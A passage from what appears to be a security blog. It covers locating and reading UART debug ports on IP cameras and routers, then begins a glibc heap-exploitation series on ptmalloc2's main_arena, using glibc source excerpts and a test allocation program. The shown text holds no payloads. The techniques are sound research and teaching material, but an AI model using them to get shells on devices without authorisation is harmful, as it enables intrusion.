<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-nYX5phM0ZX_hY7_FfKQwshBQ_X2Mi12GaqElS65ferP1UyGx0HAqC-hFA5Brk2ylDODELHYEVZdab3S7ivx-Hthn9_dve7-YjohlUD-jUIUs1H0GrwD-_GwisLjMcv9A_Y0-Bo-Zhqk/s1600/Screenshot+from+2019-07-06+14-11-00.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="559" data-original-width="641" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-nYX5phM0ZX_hY7_FfKQwshBQ_X2Mi12GaqElS65ferP1UyGx0HAqC-hFA5Brk2ylDODELHYEVZdab3S7ivx-Hthn9_dve7-YjohlUD-jUIUs1H0GrwD-_GwisLjMcv9A_Y0-Bo-Zhqk/s1600/Screenshot+from+2019-07-06+14-11-00.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: x-small;">Example of a UART port on a IP camera PCB</span></div>
<span id="goog_482312293"></span><span id="goog_482312294"></span><br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJGF9HPqQz7Hfn_yHVsYPHT6OQLXViD91jSDalAh1eYdcFi67PLi1giwYHU3jA8lr1UkROdbJd1o3WyBYS59hbP79ZfjoyiE7J8QbRP4KXCHQqNuHN41d4dwRWtgbSdywpaXdC5jLJS4I/s1600/Screenshot+from+2019-07-06+14-11-11.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="494" data-original-width="473" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJGF9HPqQz7Hfn_yHVsYPHT6OQLXViD91jSDalAh1eYdcFi67PLi1giwYHU3jA8lr1UkROdbJd1o3WyBYS59hbP79ZfjoyiE7J8QbRP4KXCHQqNuHN41d4dwRWtgbSdywpaXdC5jLJS4I/s320/Screenshot+from+2019-07-06+14-11-11.png" width="306" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;">Probing out the Ground pin on a PCB for an IP camera.</span></td></tr>
</tbody></table>
<br />
<br />
<h3 style="text-align: left;">
Finding UART Ports</h3>
<br />
Hunting down UART ports is pretty easy usually. People tend to <i>want</i> them to be easily identifiable because either a machine on an assembly is supposed to find it; or a human - but either way their not going to have anyone play where's wally to find the debug port. UARTs are typically a straight line of 3 to 4 or more signals. <i>Other typical behavior I've seen, that they can be either a very easy to see / reach place like on the edge of the board, near a SoC or other external connectors. </i><br />
<br />
The process for identifying these ports is typically the following phases.<br />
<br />
<h3 style="text-align: left;">
Methods for locating the ports/pins</h3>
Fastest method is to use the <b>data sheet</b> (<i>my RTFM moment is finally here</i>) for your device or as a first step assume there's a data sheet for literally everything (<i>avoid reverse engineering stuff you don't need to</i>) - and once you are all Google'd out and there's no data sheet anywhere in the whole world wide weeb network, then start playing with the electronics lol.<br />
<div>
<br />
<b>Find the ground signal</b>. If you don't have a ground signal identified (<i>by strong I mean, is strongly probably the right definite ground plane lol </i>), interacting with the UART safely is usually very hard to do. <i>I like identifying the ground first because it means I can hook up all my toys without having them explode</i>!<br />
<ol style="text-align: left;">
<ul>
<li><b>Continuity test between an obvious ground and suspected one</b> (<i>many PCBs have exposed metal around USB ports, power inlets etc etc that will usually be grounded</i>). To double check that you have the right ground I suggest finding the ground of the power or other ports as well and checking that there is continuity between an obvious ground, and your UART ground. </li>
</ul>
</ol>
If you have other ports near this one, check the voltage difference across some of them. Obviously making sure the numbers make sense (should be around 3-5 Volts, anything massively higher is highly strange).</div>
<div>
<br />
If you have identified another SoC or chip on the board and you have the data sheet for it. See if you can find out whether:<br />
<ol style="text-align: left;">
<ul>
<li>It has a TX or RX (or MOSI / MISO any serial ports would be huge clues!) on it, see if this might give you more context on the possible UART port you're looking for. <i>Obviously sometimes the system on chip needs to dump its debug data so it should be talking to the UART some how right? Could mean there's continuity between some pins!</i></li>
</ul>
</ol>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBg7T2bOToqLLS6L7-9j2eXvzfcwCpGLF_QfTuLJXgIvvpn6ZaDhej8ZiH4YSz9O3fA_IuX86v1rCw1mX7p6SqQ6VAoJEMGKJwoKFEihdx0dmpuyPZd3Jknp8M0WrFe89eNYfzpF8nDhI/s1600/uart_1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="311" data-original-width="536" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBg7T2bOToqLLS6L7-9j2eXvzfcwCpGLF_QfTuLJXgIvvpn6ZaDhej8ZiH4YSz9O3fA_IuX86v1rCw1mX7p6SqQ6VAoJEMGKJwoKFEihdx0dmpuyPZd3Jknp8M0WrFe89eNYfzpF8nDhI/s400/uart_1.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption"><span style="font-size: x-small;">Easy to see which one is ground. This is from a stock standard router I plucked off amazon. The two signals other than ground are as you guessed it RX and TX.</span><br />
<div style="font-size: 12.8px;">
<br /></div>
</td></tr>
</tbody></table>
</div>
<h3 style="text-align: left;">
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: "Times New Roman"; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<ol style="text-align: left;"></ol>
</div>
</h3>
<h3 style="-webkit-text-stroke-width: 0px; color: black; font-family: "Times New Roman"; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
Interacting with the ports (logic tracing)</h3>
<div>
<b>Hook up a logic analyzer</b> to it (<i>you don't always need a Saleae or how ever you spell it, some cheapo $20 one's sometimes to the job just fine!</i>). <i>Make sure your logic analyzer is grounded of course! And that the ground is common to the supposed UART! </i></div>
<div>
<i><br /></i></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidqeVhQB4PlJEj5M5r0-Vlyh5Ud1fa59iqMOyPDkSkkLk4zJq9GEY-5ryRXumeNWd9nPP_zLmHPPktydLAnmrF5gan9wQtFDd6NgZ1FIQL6FFFX7YOn3McWzEhNWo6VL955w4fM_giBZw/s1600/uart_logic.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="949" data-original-width="921" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidqeVhQB4PlJEj5M5r0-Vlyh5Ud1fa59iqMOyPDkSkkLk4zJq9GEY-5ryRXumeNWd9nPP_zLmHPPktydLAnmrF5gan9wQtFDd6NgZ1FIQL6FFFX7YOn3McWzEhNWo6VL955w4fM_giBZw/s400/uart_logic.png" width="387" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;">Logic analyzing the UART on an IP Camera board. The logic analyzer I'm using a cheapo logic analyzer here, it bearly samples above 25MHZ hehe but it does the job sometimes!</span></td></tr>
</tbody></table>
<div>
<i><br /></i>Power the device, try to capture what you think will be where most of the OS debug noise will happen - sometimes it never stops and just keeps going, but you can't capture for ever and you don't need a huge capture to confirm a UART either - so think a bit about the device life cycle!</div>
<div>
<br />
Look for some signals that register the following characteristics:<br />
<ol style="text-align: left;"><ul>
<li><b>CLK</b> - usually this is a very regular square have signal (check out some of the examples)</li>
<li><b>GND</b> - just kidding you shouldn't be seeing this in your logic analyzer! Stay woke people!</li>
<li><b>RX</b> - if you're taking about the RX from the boards perspective, this shouldn't be showing anything it should just be pulled high or stay constant at some level the whole time</li>
<li><b>TX</b> - this is where the action is, if you're looking at a common TX signal for a UART it should start showing some "OS boot-loadery" looking data, or just readable data of some kind. For a lot of embedded devices this results in a direct bootl0oader shell, so expect kernel, expect Linux, <i>expect us we are anonym-lol jk</i>. </li>
</ul>
</ol>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu0syKB7P28lZyBN7lfFXduDOn94pVIgT3gsBbh5EZvu8gbMje2TuMJYaovrnm7On8_8RJ9Dlx4pGgWlg_KtPfwT6_Ud70tisn71uImZn6F4kSA4q5wIz-EB6xYA3fPjatQg3-V_9DQ1A/s1600/uart_logic_trace.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="246" data-original-width="1472" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu0syKB7P28lZyBN7lfFXduDOn94pVIgT3gsBbh5EZvu8gbMje2TuMJYaovrnm7On8_8RJ9Dlx4pGgWlg_KtPfwT6_Ud70tisn71uImZn6F4kSA4q5wIz-EB6xYA3fPjatQg3-V_9DQ1A/s640/uart_logic_trace.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;">Some UART traffic. You'll notice that at some point the UART byte singled down always has a clock cycle with a first flop that doesn't contribute to the SET of bits that form part of the byte; this is because that little flop at the beginning is a start bit, its a signal that communicate the start of the RX cycle. </span></td></tr>
</tbody></table>
</div>
<h3 style="text-align: left;">
Interacting with the ports (dumping a UART shell)</h3>
<div>
<ol style="text-align: left;"><ul>
</ul>
<li>Get some serial bytes onto your machine. There are various ways to do this, I'll briefly cover some methods that haven't failed me so far (in my limited experience):</li>
<ul>
<li><b>Bus Pirate</b> - I know its a essentially the script kiddie version of nmap for hardware hackers; but to be honest it gets the job done and its damn easy to use!</li>
<ul>
<li><a href="http://dangerousprototypes.com/blog/bus-pirate-manual/bus-pirate-uart-guide/">http://dangerousprototypes.com/blog/bus-pirate-manual/bus-pirate-uart-guide/</a></li>
<li><a href="https://haquesprojects.wordpress.com/embedded-device-hacking/using-a-bus-pirate-as-a-usb-ttl-serial-converter/">https://haquesprojects.wordpress.com/embedded-device-hacking/using-a-bus-pirate-as-a-usb-ttl-serial-converter/</a></li>
<li><a href="https://iotmyway.wordpress.com/2018/05/19/getting-the-router-shell-using-uart-interface-and-bus-pirate/">https://iotmyway.wordpress.com/2018/05/19/getting-the-router-shell-using-uart-interface-and-bus-pirate/</a></li>
</ul>
<li><b>FTDI Serial TTL-232 cable</b>, hook your port up-to this and stick it straight into your machine; the FTDI chip on these gadgets takes care of all the gritty details involved in turning the RX / TX into something picocom can pick up on your device. </li>
<ul>
<li><a href="https://www.adafruit.com/product/70">https://www.adafruit.com/product/70</a> </li>
</ul>
<li>FPGA - for the hardcore folks out there, you can probably hook the UART upto a FPGA and use to forward it over to your machine using the FPGAs UART.</li>
</ul>
<li>Open a serial port and suck out some bytes. Many tools exist to solve this probably but it usually comes to either picocom (I use picocom alot!) to or minicom or screen, anyway here are some simple tutorials for getting them going. </li>
<ul>
<li><a href="http://wiki.t-firefly.com/ROC-RK3328-CC/debug.html">http://wiki.t-firefly.com/ROC-RK3328-CC/debug.html</a></li>
<li><a href="https://developer.ridgerun.com/wiki/index.php/Setting_up_Picocom_-_Ubuntu">https://developer.ridgerun.com/wiki/index.php/Setting_up_Picocom_-_Ubuntu</a> </li>
<li>(serial programming in python!) <a href="https://elinux.org/Serial_port_programming">https://elinux.org/Serial_port_programming</a></li>
<li><a href="https://www.cyberciti.biz/hardware/5-linux-unix-commands-for-connecting-to-the-serial-console/">https://www.cyberciti.biz/hardware/5-linux-unix-commands-for-connecting-to-the-serial-console/</a> </li>
</ul>
</ol>
<div>
Anyway that's it for this post, I'll cover more hands on UART stuff soon! Stay tuned!</div>
</div>
<h2 style="text-align: left;">
References and Reading:</h2>
<br />
<ol style="text-align: left;">
<li><a href="http://www.ti.com/lit/ug/sprugp1/sprugp1.pdf">http://www.ti.com/lit/ug/sprugp1/sprugp1.pdf</a> </li>
<li><a href="http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/">http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/</a></li>
<li><a href="https://en.wikipedia.org/wiki/Universal_asynchronous_receiver-transmitter">https://en.wikipedia.org/wiki/Universal_asynchronous_receiver-transmitter</a> </li>
<li><a href="https://www.latticesemi.com/-/media/LatticeSemi/Documents/ReferenceDesigns/SZ/UARTUniversalAsynchronousReceiverTransmitterDocumentation.ashx?document_id=3466">https://www.latticesemi.com/-/media/LatticeSemi/Documents/ReferenceDesigns/SZ/UARTUniversalAsynchronousReceiverTransmitterDocumentation.ashx?document_id=3466</a> </li>
<li><a href="http://www.ti.com/lit/ug/sprugp1/sprugp1.pdf">http://www.ti.com/lit/ug/sprugp1/sprugp1.pdf</a> </li>
</ol>
</div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-29303980718565725282019-03-14T18:17:00.002-07:002019-03-14T18:30:13.817-07:00Glibc Heap Exploitation Basics : ptmalloc2 internals (Part 3) : The Main Arena<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi folks, this post is part of a series in which I try to explore the internals of glibc's implementation ptmalloc2 which is used for managing heap memory. In this post I'm going to specifically pay attention to the <span style="font-family: "courier new" , "courier" , monospace;">main_arena</span> and the <span style="font-family: "courier new" , "courier" , monospace;">malloc_state</span> structure, which is used to store some important pointers for searching heap memory.<br />
<h2 style="text-align: left;">
The main arena</h2>
The heap bakes the main_arena struct right into process memory. Its a struct of the type <span style="font-family: "courier new" , "courier" , monospace;">malloc_state</span> and holds the following fields (<i>extract from glibc-2.23/malloc/malloc.c</i>):<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">1686 struct malloc_state</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1687 { </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1688 /* Serialize access. */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1689 <b>mutex_t mutex;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1690 </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1691 /* Flags (formerly in max_fast). */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1692 <b>int flags;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1693 </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1694 /* Fastbins */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1695 <b>mfastbinptr fastbinsY[NFASTBINS];</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1696 </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1697 /* Base of the topmost chunk -- not otherwise kept in a bin */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1698 <b>mchunkptr top;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1699 </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1700 /* The remainder from the most recent split of a small request */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1701 <b>mchunkptr last_remainder;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1702 </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1703 /* Normal bins packed as described above */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1704 <b>mchunkptr bins[NBINS * 2 - 2];</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1705 </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1706 /* Bitmap of bins */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1707 <b>unsigned int binmap[BINMAPSIZE];</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1708 </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1709 /* Linked list */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1710 <b>struct malloc_state *next;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1711 </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1712 /* Linked list for free arenas. Access to this field is serialized</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1713 by free_list_lock in arena.c. */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1714 <b>struct malloc_state *next_free;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1715 </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1716 /* Number of threads attached to this arena. 0 if the arena is on</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1717 the free list. Access to this field is serialized by</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1718 free_list_lock in arena.c. */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1719 <b>INTERNAL_SIZE_T attached_threads;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1720 </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1721 /* Memory allocated from the system in this arena. */</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1722 <b>INTERNAL_SIZE_T system_mem;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1723 <b> INTERNAL_SIZE_T max_system_mem;</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1724 };</span><br />
<div>
<br />
<br />
Here's what some of the interesting fields mean (<i>in addition to the already very helpful docs</i>):<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>mutex_t mutex</b> -</span> this field is an integer that can be used to prevent other threads from messing with the arena while its being modified. We can see a confirmation of this in the code:</li>
</ul>
<div>
<br /></div>
<div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 29 /* The mutex functions used to do absolutely nothing, i.e. lock,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 30 trylock and unlock would always just return 0. However, even</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 31 without any concurrently active threads, a mutex can be used</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 32 legitimately as an `in use' flag. To make the code that is</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 33 protected by a mutex async-signal safe, these macros would have to</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 34 be based on atomic test-and-set operations, for example. */</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 35 <b>typedef int mutex_t;</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 36 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 37 # define mutex_init(m) (*(m) = 0)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 38 # define mutex_lock(m) ({ *(m) = 1; 0; })</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 39 # define mutex_trylock(m) (*(m) ? 1 : ((*(m) = 1), 0))</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 40 # define mutex_unlock(m) (*(m) = 0)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 41 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> 42 #endif /* !defined mutex_init */</span></div>
</div>
</div>
<div>
<br /></div>
<br />
<div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>int flags</b></span> - this is an integer field that main arena uses to mark itself with properties. For instance should there be multiple main arena's (<i>peep at the linked list node below and clues about <span style="font-family: "courier new" , "courier" , monospace;">attached_threads</span></i>). In order to make using this field easy there are an accompanying list of functions for using these fields in the code:</li>
</ul>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1640<b> #define have_fastchunks(M) (((M)->flags & FASTCHUNKS_BIT) == 0)</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1641 <b>#define clear_fastchunks(M) catomic_or (&(M)->flags, FASTCHUNKS_BIT)</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1642 <b>#define set_fastchunks(M) catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1643 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">...</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1652 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1653 <b>#define NONCONTIGUOUS_BIT (2U)</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1654 </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1655 <b>#define contiguous(M) </b> (((M)->flags & NONCONTIGUOUS_BIT) == 0)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1656 <b>#define noncontiguous(M)</b> (((M)->flags & NONCONTIGUOUS_BIT) != 0)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1657 <b>#define set_noncontiguous(M)</b> ((M)->flags |= NONCONTIGUOUS_BIT)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1658 <b>#define set_contiguous(M)</b> ((M)->flags &= ~NONCONTIGUOUS_BIT)</span></div>
</div>
<div>
<br /></div>
<div>
These are pretty self documenting. </div>
</div>
<div>
<br /></div>
<div>
<ul style="text-align: left;">
<li><b style="font-family: "courier new", courier, monospace;">fastbinsY - </b><span style="font-family: inherit;">a pointer to the start of the fastbin array obviously this helps provide a common point in running down the fastbin structure. <i>As I may have mentioned before fastbins are arranged by size, so what we have here is essentially a kind of minimalist priority heap.</i> </span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>mchunkptr top</b></span> - pointer to the top chunk on the heap.</li>
<li><i>skipping last_remainder for now</i></li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>mchunkptr bins</b></span> - A pointer to the start of the unsorted bins. All chunks that are above fastbin max size will have pointers here, and the first two indexes are unsorted bins according to documentation.</li>
</ul>
<ul style="text-align: left;">
<li><b style="font-family: "Courier New", Courier, monospace;">unsigned int binmap</b><span style="font-family: inherit;"> - list of indexes for all of the bins indicating if they are free. We can see how its used in the _do_check_malloc_state function which is thrown in to the source for the sake of aiding debugging:</span></li>
</ul>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1576 #define mark_bin(m, i)<b> </b>((m)->binmap[idx2block (i)] |= idx2bit (i))</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">1577 #define unmark_bin(m, i)<b> </b>((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><b>1578 #define get_binmap(m, i) </b>((m)->binmap[idx2block (i)] & idx2bit (i))</span></div>
</div>
<span style="font-family: "courier new" , "courier" , monospace;">
<div>
...</div>
<div>
2111 static void</div>
<div>
<b>2112 do_check_malloc_state (mstate av)</b></div>
<div>
2113 {</div>
<div>
2114 int i;</div>
<div>
2115 mchunkptr p;</div>
<div>
2116 mchunkptr q;</div>
<div>
...</div>
</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2188 /* binmap is accurate (except for bin 1 == unsorted_chunks) */</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2189 if (i >= 2)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2190 {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><b>2191 unsigned int binbit = get_binmap (av, i);</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2192 int empty = last (b) == b;</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2193 if (!binbit)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2194 assert (empty);</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2195 else if (!empty)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">2196 assert (binbit);</span></div>
</div>
</div>
<div>
<br /></div>
<div>
So it uses this to extract a "binbit" and this asserts whether the bin is in use or not. Anyway that's enough about the fields lets see them in action. </div>
</div>
<h2 style="text-align: left;">
Exploring the main_arena with gdb</h2>
<div>
To explore the <span style="font-family: "courier new" , "courier" , monospace;">main_arena</span> I whipped up a simple C program that allocates some chunks in series according to a size I specify on the command line.<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">> cat arena.c </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">#include <stdlib.h></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">#include <string.h></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">#include <unistd.h></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">#include <time.h></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">char *make_string(size_t length){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>char *arr = (char *) malloc(length);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>asm("int $3");</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>return arr;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">void free_string(char *arr){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>free(arr);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>asm("int $3");</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>return;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">/*</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>Generate chunks in a list with a single size</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>- shows us how fast chunks work</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">*/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">void make_chunk_field(size_t chunk_length,size_t amount_of_chunks){<span style="white-space: pre;"> </span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>int index = 0;<span style="white-space: pre;"> </span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>char **chunks = malloc(amount_of_chunks*sizeof(char *)); </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>//printf("[*] chunk array head at [%p]\n",&chunks);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>for (index = 0;index < amount_of_chunks; index++){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>chunks[index] = make_string(chunk_length);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>memset(chunks[index],0x40+index,chunk_length);<span style="white-space: pre;"> </span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>for (index = 0; index < amount_of_chunks;index++){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>memset(chunks[index],0xFF,chunk_length);<span style="white-space: pre;"> </span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>free_string(chunks[index]);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">int main(int argc, char **argv){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>int run = 0;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>if (argc < 4){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>printf("Usage : %s [chunk length (bytes)] [number of chunks] [rounds]",argv[0]);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>return 2;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>size_t chunk_length = atoi(argv[1]);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>unsigned int number_of_chunks = atoi(argv[2]);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>int cycles = atoi(argv[3]);</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>int index = 0;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>for (index =0;index<cycles;index++){</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>make_chunk_field(chunk_length,number_of_chunks);</span><br />
